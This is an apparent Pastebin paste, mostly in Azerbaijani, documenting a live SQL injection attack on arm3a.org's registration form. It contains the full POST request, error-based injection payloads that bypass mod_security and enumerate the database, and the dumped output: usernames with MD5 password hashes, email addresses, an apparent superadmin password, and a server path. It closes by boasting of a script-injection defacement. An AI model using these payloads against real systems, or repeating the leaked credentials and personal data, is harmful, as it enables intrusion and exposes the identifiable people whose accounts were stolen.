API tools faq
paste
Advertisement
Guest User

dr4g74df4gfd4g5dfg5

a guest
Dec 1st, 2012
421
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.87 KB | None | 0 0
raw download clone embed print report
  1. Cox narahat sekilde mod_security ile qorunub.
  2. $_GET metodundaki injectionda mumkun deyil getmek injectionu.
  3. Amma $_POST metodla asagidaki kimi Tepeledik)
  4.  
  5.  
  6.  
  7.  
  8. |SELECT user_name, password FROM `members` WHERE user_name='sikdirde' order by 10-- AND 9='9' OR password='sikdirde' order by 10-- AND 9='9'|Unknown column '10' in 'order clause'
  9.  
  10.  
  11. =========================================================
  12.  
  13.  
  14. http://arm3a.org/index.php?go=registration&lang=en&act=insert
  15. METHOD POST:
  16. =========================================================
  17. HEADERS:
  18.  
  19. Host: arm3a.org
  20. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Firefox/17.0
  21. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  22. Accept-Language: en-US,en;q=0.5
  23. Accept-Encoding: gzip, deflate
  24. DNT: 1
  25. Connection: keep-alive
  26. Cookie: PHPSESSID=nrmdlu0n9scltvegj96idg1fj2; __utma=78176324.467657248.1354401113.1354401113.1354401113.1; __utmb=78176324.17.10.1354401113; __utmc=78176324; __utmz=78176324.1354401113.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CircleCookieTest=1
  27. Content-Type: multipart/form-data; boundary=---------------------------265001916915724
  28. Content-Length: 3019
  29.  
  30. =========================================================
  31.  
  32.  
  33. REQUEST BODY:
  34.  
  35. -----------------------------265001916915724\r\n
  36. Content-Disposition: form-data; name="first_name_en"\r\n
  37. \r\n
  38. '\r\n
  39. -----------------------------265001916915724\r\n
  40. Content-Disposition: form-data; name="last_name_en"\r\n
  41. \r\n
  42. '\r\n
  43. -----------------------------265001916915724\r\n
  44. Content-Disposition: form-data; name="patronymic_en"\r\n
  45. \r\n
  46. '\r\n
  47. -----------------------------265001916915724\r\n
  48. Content-Disposition: form-data; name="gender"\r\n
  49. \r\n
  50. 1\r\n
  51. -----------------------------265001916915724\r\n
  52. Content-Disposition: form-data; name="residence_country_id"\r\n
  53. \r\n
  54. 7\r\n
  55. -----------------------------265001916915724\r\n
  56. Content-Disposition: form-data; name="title_en"\r\n
  57. \r\n
  58. '\r\n
  59. -----------------------------265001916915724\r\n
  60. Content-Disposition: form-data; name="email"\r\n
  61. \r\n
  62. aaa@aaa.com\r\n
  63. -----------------------------265001916915724\r\n
  64. Content-Disposition: form-data; name="mobile"\r\n
  65. \r\n
  66. '\r\n
  67. -----------------------------265001916915724\r\n
  68. Content-Disposition: form-data; name="is_subscribed"\r\n
  69. \r\n
  70. 1\r\n
  71. -----------------------------265001916915724\r\n
  72. Content-Disposition: form-data; name="user_name"\r\n
  73. \r\n
  74. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(tabLE_NAME,0x7c) FROM INFORMATION_SCHEMA.TABLES where table_schema=database() LIMIT 1 offset 80),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  75. -----------------------------265001916915724\r\n
  76. Content-Disposition: form-data; name="password"\r\n
  77. \r\n
  78. sikdirde' order by 10-- AND 9='9\r\n
  79. -----------------------------265001916915724\r\n
  80. Content-Disposition: form-data; name="password_copy"\r\n
  81. \r\n
  82. sikdirde' order by 10-- AND 9='9\r\n
  83. -----------------------------265001916915724\r\n
  84. Content-Disposition: form-data; name="charter_accepted"\r\n
  85. \r\n
  86. 1\r\n
  87. -----------------------------265001916915724\r\n
  88. Content-Disposition: form-data; name="content_en"\r\n
  89. \r\n
  90. \r\n
  91. -----------------------------265001916915724\r\n
  92. Content-Disposition: form-data; name="tmp_date_birthdate"\r\n
  93. \r\n
  94. 02-12-2012\r\n
  95. -----------------------------265001916915724\r\n
  96. Content-Disposition: form-data; name="birthdate"\r\n
  97. \r\n
  98. 2012-12-02\r\n
  99. -----------------------------265001916915724\r\n
  100. Content-Disposition: form-data; name="personal_phone"\r\n
  101. \r\n
  102. \r\n
  103. -----------------------------265001916915724\r\n
  104. Content-Disposition: form-data; name="personal_address_en"\r\n
  105. \r\n
  106. \r\n
  107. -----------------------------265001916915724\r\n
  108. Content-Disposition: form-data; name="expertise_areas_en"\r\n
  109. \r\n
  110. \r\n
  111. -----------------------------265001916915724\r\n
  112. Content-Disposition: form-data; name="experience_en"\r\n
  113. \r\n
  114. \r\n
  115. -----------------------------265001916915724\r\n
  116. Content-Disposition: form-data; name="speciality_en"\r\n
  117. \r\n
  118. \r\n
  119. -----------------------------265001916915724\r\n
  120. Content-Disposition: form-data; name="scientific_degree_en"\r\n
  121. \r\n
  122. \r\n
  123. -----------------------------265001916915724\r\n
  124. Content-Disposition: form-data; name="university_en"\r\n
  125. \r\n
  126. \r\n
  127. -----------------------------265001916915724\r\n
  128. Content-Disposition: form-data; name="school_en"\r\n
  129. \r\n
  130. \r\n
  131. -----------------------------265001916915724\r\n
  132. Content-Disposition: form-data; name="hobby_en"\r\n
  133. \r\n
  134. \r\n
  135. -----------------------------265001916915724\r\n
  136. Content-Disposition: form-data; name="3_any_small"; filename=""\r\n
  137. Content-Type: application/octet-stream\r\n
  138. \r\n
  139. \r\n
  140. -----------------------------265001916915724\r\n
  141. Content-Disposition: form-data; name="save"\r\n
  142. \r\n
  143. Save\r\n
  144. -----------------------------265001916915724--\r\n
  145.  
  146. ==============================================================
  147.  
  148.  
  149. payload:
  150.  
  151. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(tabLE_NAME,0x7c) FROM INFORMATION_SCHEMA.columns where table_schema=database() and column_name='password' LIMIT 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  152.  
  153.  
  154. helelik lazimli tablelar bele ki password columnu var bu table-larda.
  155.  
  156. offset 0 ====== 123_users
  157. offset 1 ========= members
  158.  
  159. offset 2 =========== members_backup
  160.  
  161. offset 3 ================= organizations
  162.  
  163.  
  164.  
  165.  
  166. =============
  167. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(count(*),0x7c) FROM 123_users),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  168.  
  169.  
  170. 6
  171.  
  172.  
  173. =============
  174. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(column_name,0x7c) FROM information_schema.columns where table_name='123_users' limit 1 offset 6),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  175.  
  176.  
  177.  
  178.  
  179. id
  180. full_name
  181. user_name
  182. password
  183. email
  184. is_banned
  185. rank
  186.  
  187. concat(id,0x7c,full_name,0x7c,user_name,0x7c,password,0x7c,email,0x7c,is_banned,0x7c,rank,0x7c) from 123_users
  188.  
  189.  
  190.  
  191. =============
  192.  
  193.  
  194. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,password,0x7c) FROM 123_users limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  195.  
  196. lilitkhalatyan|b7712161f4025c30f88ac2fd3e43f947
  197.  
  198. suro@itnet.am
  199.  
  200.  
  201.  
  202.  
  203.  
  204.  
  205. kopaloni|2045f9c08a7676957e61e683658b2acd
  206.  
  207.  
  208.  
  209. superadmin|4820ae2c8b5bca80656829e47e1ee0a4
  210.  
  211. AnnaSayadyan|4a3f0aa47a96eb616286c626b4a9d36d
  212.  
  213.  
  214.  
  215. animkrtchyan|b53599f87d9d0417b569c4a51288f764
  216.  
  217.  
  218. annag_at_mail_dot_ru|ed9fa1fb3337ef5a871e0302d6f1f5c6
  219.  
  220.  
  221.  
  222. ========================================
  223. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,id,0x7c) FROM members limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  224. gagikkarap
  225.  
  226. gagikkarap 44444444
  227.  
  228. gagikk@cit.am
  229. ========================================
  230. Login: superadmin
  231.  
  232. pass: arm3a
  233.  
  234. Admikani tapa bilmirem Fuck off)
  235.  
  236.  
  237.  
  238.  
  239. http://arm3a.org/members.php
  240.  
  241. path Disclosure:
  242.  
  243. /usr/local/www/apache22/www.arm3a.org/data/members.php
  244.  
  245.  
  246. ==========================================
  247.  
  248. table: members
  249.  
  250.  
  251. given_email
  252. email
  253. ITIN
  254. password
  255. user_name
  256. rank
  257. is_logged_in
  258.  
  259.  
  260. 485 member var.
  261.  
  262.  
  263.  
  264.  
  265.  
  266. sikdirde' or (select floor(rand(0)*2) from(select count(*),concat((select concat(column_name,0x7c) FROM information_schema.columns where table_name='members' limit 1 offset 84),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n
  267.  
  268. son yuxaridaki offsetdir bu table-da.
  269.  
  270. Plaintext pass userlerde)
  271. profile girib html/script inject oldu Fucked)
  272.  
  273. http://arm3a.org/?lang=am&go=members
  274. http://arm3a.org/?lang=en&go=home http://zone-h.org/mirror/id/18683315
  275.  
  276.  
  277.  
  278. Adminkani tapan olsa halal xosu mixlasin o servere.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!